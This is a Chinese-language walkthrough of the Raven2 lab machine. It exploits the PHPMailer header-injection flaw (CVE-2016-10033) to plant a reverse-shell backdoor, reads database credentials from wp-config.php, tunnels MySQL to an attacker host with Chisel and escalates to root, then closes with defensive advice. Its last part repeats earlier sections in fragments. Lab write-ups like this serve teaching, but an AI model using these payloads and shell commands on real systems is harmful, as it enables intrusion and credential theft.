Raven2 渗透测试实战教学文档<\/h1>

1. 目标概述<\/h2>
本次渗透测试的目标是 Vulnhub 上的 Raven2 虚拟机，通过 PHPMailer RCE 漏洞和 MySQL 权限提升技术获取系统 root 权限。<\/p>

2. 信息收集阶段<\/h2>

2.1 主机发现与端口扫描<\/h3>

使用 Nmap 进行全端口扫描：<\/p>

nmap -p- 192.168.101.160 --min-rate 1000<\/span> -sC -sV
<\/span><\/span><\/code><\/pre>扫描结果：<\/p>

22\/tcp: OpenSSH 6.7p1 Debian 5+deb8u4<\/li>
80\/tcp: Apache httpd 2.4.10 (Debian)<\/li>
111\/tcp: rpcbind 2-4<\/li>
46606\/tcp: status 1 (RPC)<\/li>
<\/ul>
2.2 Web 目录枚举<\/h3>
使用 Gobuster 进行目录扫描：<\/p>
gobuster dir -u "http:\/\/192.168.101.160\/"<\/span> -w \/usr\/share\/seclists\/Discovery\/Web-Content\/directory-list-2.3-big.txt -x .php
<\/span><\/span><\/code><\/pre>发现重要路径：<\/p>

\/vendor\/<\/code> - 包含 PHPMailer 版本信息<\/li>
\/wordpress\/<\/code> - WordPress 站点<\/li>
<\/ul>
2.3 用户枚举<\/h3>
发现潜在用户名：<\/p>

steven<\/li>
michael<\/li>
<\/ul>
3. 漏洞利用阶段<\/h2>
3.1 PHPMailer RCE (CVE-2016-10033)<\/h3>
漏洞分析<\/h4>
PHPMailer 5.2.16 版本存在远程代码执行漏洞，攻击者可以通过精心构造的邮件头注入恶意命令。<\/p>
利用步骤<\/h4>

准备 exploit 脚本 (exploit.py)<\/li>
<\/ol>
# 脚本内容见原文，关键点：<\/span>
<\/span><\/span>fields =<\/span> {
<\/span><\/span>    'action'<\/span>: 'submit'<\/span>,
<\/span><\/span>    'name'<\/span>: payload,
<\/span><\/span>    'email'<\/span>: f<\/span>'"anarcoder<\/span>\\<\/span>" -OQueueDirectory=\/tmp -X\/var\/www\/html<\/span>{<\/span>backdoor}<\/span> server<\/span>\"<\/span> @protonmail.com'<\/span>,
<\/span><\/span>    'message'<\/span>: 'Pwned'<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
执行 exploit<\/li>
<\/ol>
python3 exploit.py http:\/\/192.168.101.160\/contact.php reverse.php 192.168.101.128 10032<\/span>
<\/span><\/span><\/code><\/pre>
触发后门<\/li>
<\/ol>
curl http:\/\/raven.local\/reverse.php
<\/span><\/span><\/code><\/pre>
获取交互式 shell<\/li>
<\/ol>
python -c 'import pty;pty.spawn("\/bin\/bash")'<\/span>
<\/span><\/span><\/code><\/pre>获取的 Flag<\/h4>

flag1{a2c1f66d2b8051bd3a5874b5b6e43e21} - 位于 \/vendor\/PATH<\/li>
flag2{6a8ed560f0b5358ecf844108048eb337} - 位于 \/var\/www\/flag2.txt<\/li>
flag3{a0f568aa9de277887f37730d71520d9b} - 位于 \/wordpress\/wp-content\/uploads\/2018\/11\/flag3.png<\/li>
<\/ul>
3.2 权限提升 (MySQL 提权)<\/h3>
信息收集<\/h4>
查看 WordPress 配置文件获取数据库凭据：<\/p>
cat \/var\/www\/html\/wordpress\/wp-config.php
<\/span><\/span><\/code><\/pre>发现：<\/p>

用户名: root<\/li>
密码: R@v3nSecurity<\/li>
<\/ul>
建立隧道<\/h4>
使用 Chisel 建立 MySQL 隧道：<\/p>
攻击机：<\/p>
.\/chisel server -p 8000<\/span> --reverse
<\/span><\/span><\/code><\/pre>目标机：<\/p>
.\/chisel client 192.168.101.128:8000 R:3306:localhost:3306&
<\/span><\/span><\/code><\/pre>MySQL 提权<\/h4>
使用 MSQP (MySQL Server Privilege Escalation) 工具：<\/p>

克隆工具：<\/li>
<\/ol>
git clone https:\/\/github.com\/MartinxMax\/MSQP.git
<\/span><\/span><\/code><\/pre>
安装依赖：<\/li>
<\/ol>
python3 -m pip install mysql-connector-python
<\/span><\/span><\/code><\/pre>
执行提权：<\/li>
<\/ol>
python3 msqp.py 127.0.0.1 3306<\/span> root R@v3nSecurity 192.168.101.128 10033<\/span>
<\/span><\/span><\/code><\/pre>获取 root 权限<\/h4>
成功获取 root shell 后，读取最终 flag：<\/p>
cat \/root\/flag4.txt
<\/span><\/span><\/code><\/pre>
flag4{df2bc5e951d91581467bb9a2a8ff4425}<\/li>
<\/ul>
4. 关键知识点总结<\/h2>


PHPMailer RCE (CVE-2016-10033)<\/strong><\/p>

影响版本：< 5.2.18<\/li>
利用方式：通过邮件头注入实现任意命令执行<\/li>
防御措施：升级 PHPMailer 版本，过滤用户输入<\/li>
<\/ul>
<\/li>

MySQL 权限提升<\/strong><\/p>

利用 root 数据库账户执行系统命令<\/li>
需要数据库有 FILE 权限<\/li>
防御措施：避免使用 root 账户运行应用，限制 MySQL 用户权限<\/li>
<\/ul>
<\/li>

隧道技术<\/strong><\/p>

使用 Chisel 建立反向隧道绕过防火墙限制<\/li>
适用于内网穿透场景<\/li>
<\/ul>
<\/li>

信息收集技巧<\/strong><\/p>

配置文件泄露 (\/vendor\/, wp-config.php)<\/li>
目录枚举发现敏感文件<\/li>
版本信息收集确定漏洞利用可能性<\/li>
<\/ul>
<\/li>
<\/ol>
5. 防御建议<\/h2>

及时更新所有软件组件到最新版本<\/li>
避免使用 root 权限运行数据库服务<\/li>
实施最小权限原则<\/li>
定期审计系统配置和权限设置<\/li>
对用户输入进行严格过滤和验证<\/li>
禁用不必要的服务和端口<\/li>
<\/ol>
通过本案例可以学习到从 Web 应用到系统权限的完整渗透流程，以及如何利用多个漏洞进行纵深攻击。<\/p>

Raven2 渗透测试实战教学文档<\/h1>

1. 目标概述<\/h2> 本次渗透测试的目标是 Vulnhub 上的 Raven2 虚拟机，通过 PHPMailer RCE 漏洞和 MySQL 权限提升技术获取系统 root 权限。<\/p>

2. 信息收集阶段<\/h2>

3. 漏洞利用阶段<\/h2>

3.1 PHPMailer RCE (CVE-2016-10033)<\/h3>

漏洞分析<\/h4> PHPMailer 5.2.16 版本存在远程代码执行漏洞，攻击者可以通过精心构造的邮件头注入恶意命令。<\/p>

3.2 权限提升 (MySQL 提权)<\/h3>

1. 目标概述<\/h2>
本次渗透测试的目标是 Vulnhub 上的 Raven2 虚拟机，通过 PHPMailer RCE 漏洞和 MySQL 权限提升技术获取系统 root 权限。<\/p>

漏洞分析<\/h4>
PHPMailer 5.2.16 版本存在远程代码执行漏洞，攻击者可以通过精心构造的邮件头注入恶意命令。<\/p>